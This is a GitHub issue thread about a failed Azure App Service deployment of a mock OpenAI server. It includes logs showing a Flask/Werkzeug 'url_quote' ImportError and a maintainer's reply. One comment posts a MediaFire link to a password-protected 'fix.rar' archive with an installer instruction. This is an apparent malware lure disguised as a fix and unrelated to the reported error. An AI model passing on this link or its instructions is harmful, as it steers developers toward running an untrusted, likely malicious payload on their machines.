### ISSUE TITLE
Moc server deploymnet failing with 

### ISSUE THREAD

**Issue by erezbatish-ms** [Azure-Samples/AI-Gateway#56]
When I try to run step1 to deploy the moc server in the OpenAI Moc Server playbook, I'm getting the below error:

InprogressInstances: 0, SuccessfulInstances: 0, FailedInstances: 1
Error: Deployment for site 'erezopenaimock2' with DeploymentId 'cb242250-038a-4c1a-80cb-273cf0dbf9a2' failed because the worker proccess failed to start within the allotted time.
Please check the runtime logs for more info: https://erezopenaimock2.scm.azurewebsites.net/api/logs/docker

This is the logs from the container:

2024-08-27T12:44:48.462925550Z    _____                               
2024-08-27T12:44:48.462956150Z   /  _  \ __________ _________   ____  
2024-08-27T12:44:48.462960450Z  /  /_\  \\___   /  |  \_  __ \_/ __ \ 
2024-08-27T12:44:48.462963750Z /    |    \/    /|  |  /|  | \/\  ___/ 
2024-08-27T12:44:48.462966750Z \____|__  /_____ \____/ |__|    \___  >
2024-08-27T12:44:48.462970250Z         \/      \/                  \/ 
2024-08-27T12:44:48.462973650Z A P P   S E R V I C E   O N   L I N U X
2024-08-27T12:44:48.462976550Z 
2024-08-27T12:44:48.462979150Z Documentation: http://aka.ms/webapp-linux
2024-08-27T12:44:48.462982250Z Python 3.12.2
2024-08-27T12:44:48.462984951Z Note: Any data outside '/home' is not persisted
2024-08-27T12:44:50.211399150Z Starting OpenBSD Secure Shell server: sshd.
2024-08-27T12:44:50.253797088Z WEBSITES_INCLUDE_CLOUD_CERTS is not set to true.
2024-08-27T12:44:50.443725352Z App Command Line not configured, will attempt auto-detect
2024-08-27T12:44:50.443801553Z Launching oryx with: create-script -appPath /home/site/wwwroot -output /opt/startup/startup.sh -virtualEnvName antenv -defaultApp /opt/defaultsite
2024-08-27T12:44:50.774175304Z Found build manifest file at '/home/site/wwwroot/oryx-manifest.toml'. Deserializing it...
2024-08-27T12:44:50.774201404Z Build Operation ID: 3cc43fba11341282
2024-08-27T12:44:50.774206604Z Oryx Version: 0.2.20240501.1, Commit: f83f88d3cfb8bb6d3e2765e1dcd218eb0814a095, ReleaseTagName: 20240501.1
2024-08-27T12:44:50.774222905Z Output is compressed. Extracting it...
2024-08-27T12:44:50.774226705Z Extracting '/home/site/wwwroot/output.tar.gz' to directory '/tmp/8dcc695c99f8d28'...
2024-08-27T12:44:53.520250192Z App path is set to '/tmp/8dcc695c99f8d28'
2024-08-27T12:44:54.941422654Z Detected an app based on Flask
2024-08-27T12:44:54.958470050Z Generating `gunicorn` command for 'app:app'
2024-08-27T12:44:54.978816464Z Writing output script to '/opt/startup/startup.sh'
2024-08-27T12:44:55.523474434Z Using packages from virtual environment antenv located at /tmp/8dcc695c99f8d28/antenv.
2024-08-27T12:44:55.523504434Z Updated PYTHONPATH to '/opt/startup/app_logs:/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages'
2024-08-27T12:44:57.902603843Z [2024-08-27 12:44:57 +0000] [67] [INFO] Starting gunicorn 23.0.0
2024-08-27T12:44:57.960828381Z [2024-08-27 12:44:57 +0000] [67] [INFO] Listening at: http://0.0.0.0:8000 (67)
2024-08-27T12:44:57.962236089Z [2024-08-27 12:44:57 +0000] [67] [INFO] Using worker: sync
2024-08-27T12:44:57.980802497Z [2024-08-27 12:44:57 +0000] [72] [INFO] Booting worker with pid: 72
2024-08-27T12:45:06.087265001Z [2024-08-27 12:45:06 +0000] [72] [ERROR] Exception in worker process
2024-08-27T12:45:06.087299401Z Traceback (most recent call last):
2024-08-27T12:45:06.087310402Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/arbiter.py", line 608, in spawn_worker
2024-08-27T12:45:06.087323602Z     worker.init_process()
2024-08-27T12:45:06.087327202Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/workers/base.py", line 135, in init_process
2024-08-27T12:45:06.087330502Z     self.load_wsgi()
2024-08-27T12:45:06.087336802Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/workers/base.py", line 147, in load_wsgi
2024-08-27T12:45:06.087340102Z     self.wsgi = self.app.wsgi()
2024-08-27T12:45:06.087343102Z                 ^^^^^^^^^^^^^^^
2024-08-27T12:45:06.087346102Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/app/base.py", line 66, in wsgi
2024-08-27T12:45:06.087349402Z     self.callable = self.load()
2024-08-27T12:45:06.087352602Z                     ^^^^^^^^^^^
2024-08-27T12:45:06.087355702Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/app/wsgiapp.py", line 57, in load
2024-08-27T12:45:06.087359002Z     return self.load_wsgiapp()
2024-08-27T12:45:06.087362202Z            ^^^^^^^^^^^^^^^^^^^
2024-08-27T12:45:06.087365202Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/app/wsgiapp.py", line 47, in load_wsgiapp
2024-08-27T12:45:06.087368402Z     return util.import_app(self.app_uri)
2024-08-27T12:45:06.087371502Z            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27T12:45:06.087374602Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/gunicorn/util.py", line 370, in import_app
2024-08-27T12:45:06.087378002Z     mod = importlib.import_module(module)
2024-08-27T12:45:06.087381102Z           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27T12:45:06.087384202Z   File "/opt/python/3.12.2/lib/python3.12/importlib/__init__.py", line 90, in import_module
2024-08-27T12:45:06.087387502Z     return _bootstrap._gcd_import(name[level:], package, level)
2024-08-27T12:45:06.087390502Z            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2024-08-27T12:45:06.087393602Z   File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
2024-08-27T12:45:06.087397502Z   File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
2024-08-27T12:45:06.087400702Z   File "<frozen importlib._bootstrap>", line 1331, in _find_and_load_unlocked
2024-08-27T12:45:06.087404102Z   File "<frozen importlib._bootstrap>", line 935, in _load_unlocked
2024-08-27T12:45:06.087407302Z   File "<frozen importlib._bootstrap_external>", line 995, in exec_module
2024-08-27T12:45:06.087410602Z   File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
2024-08-27T12:45:06.087413902Z   File "/tmp/8dcc695c99f8d28/app.py", line 7, in <module>
2024-08-27T12:45:06.087418002Z     from flask import (Flask, redirect, render_template, request, make_response,
2024-08-27T12:45:06.087424702Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/flask/__init__.py", line 5, in <module>
2024-08-27T12:45:06.087428202Z     from .app import Flask as Flask
2024-08-27T12:45:06.087431202Z   File "/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/flask/app.py", line 30, in <module>
2024-08-27T12:45:06.087435002Z     from werkzeug.urls import url_quote
2024-08-27T12:45:06.087438302Z ImportError: cannot import name 'url_quote' from 'werkzeug.urls' (/tmp/8dcc695c99f8d28/antenv/lib/python3.12/site-packages/werkzeug/urls.py)
2024-08-27T12:45:06.087441702Z [2024-08-27 12:45:06 +0000] [72] [INFO] Worker exiting (pid: 72)
2024-08-27T12:45:06.790664101Z [2024-08-27 12:45:06 +0000] [67] [ERROR] Worker (pid:72) exited with code 3
2024-08-27T12:45:06.791460805Z [2024-08-27 12:45:06 +0000] [67] [ERROR] Shutting down: Master
2024-08-27T12:45:06.801616264Z [2024-08-27 12:45:06 +0000] [67] [ERROR] Reason: Worker failed to boot.

Please advise
Thanks.

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vieiraae** [comment]
I cannot replicate your issue. I just repeat the steps and it worked. Please ensure that you are using the latest az version.
